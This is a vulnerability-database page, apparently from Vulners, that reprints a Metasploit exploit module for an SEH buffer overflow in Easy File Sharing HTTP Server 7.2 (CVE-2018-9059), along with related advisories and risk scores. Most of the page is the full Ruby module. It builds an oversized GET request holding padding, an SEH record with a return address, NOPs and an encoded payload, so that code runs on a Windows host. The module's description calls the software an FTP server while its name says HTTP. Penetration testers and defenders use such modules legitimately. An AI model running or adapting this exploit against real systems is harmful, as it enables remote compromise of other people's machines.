Easy File Sharing HTTP Server 7.2 SEH Overflow
🗓️ 02 Dec 2015 00:00:00Reported by Starwarsfan2099 <[email protected]>Type
metasploit🔗 www.rapid7.com👁 20 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Easy File Sharing Web Server 7.2 - Stack Buffer Overflow Exploit | 18 Apr 201800:00 | – | zdt | |
| Easy File Sharing Web Server 7.2 - UserID Remote Buffer Overflow (DEP Bypass) Exploit | 24 Apr 201800:00 | – | zdt | |
| CVE-2018-9059 | 20 Apr 201821:29 | – | attackerkb | |
| CVE-2018-9059 | 29 May 201815:50 | – | circl | |
| EFS Easy File Sharing Web Server Buffer Overflow Vulnerability | 24 Apr 201800:00 | – | cnvd | |
| CVE-2018-9059 | 20 Apr 201821:00 | – | cve | |
| CVE-2018-9059 | 20 Apr 201821:00 | – | cvelist | |
| Easy File Sharing Web Server 7.2 - Stack Buffer Overflow | 18 Apr 201800:00 | – | exploitdb | |
| Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) | 24 Apr 201800:00 | – | exploitdb | |
| Easy File Sharing Web Server 7.2 - Stack Buffer Overflow | 18 Apr 201800:00 | – | exploitpack |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-9059' ],
[ 'EDB', '39008' ],
],
'Privileged' => true,
'Payload' => {
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' => [
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
],
'DefaultOptions' => {
'RPORT' => 80
},
'DisclosureDate' => '2015-12-02',
'DefaultTarget' => 0,
'Notes' => {
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
)
)
end
def print_status(msg = '')
super("#{peer} - #{msg}")
end
def exploit
connect
print_status("Sending exploit...")
sploit = "GET "
sploit << rand_text_alpha_upper(4061)
sploit << generate_seh_record(target.ret)
sploit << make_nops(19)
sploit << payload.encoded
sploit << make_nops(7)
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
sploit << " HTTP/1.0\r\n\r\n"
sock.put(sploit)
print_good("Exploit Sent")
handler
disconnect
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2015 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.5
CVSS 39.8
EPSS0.7694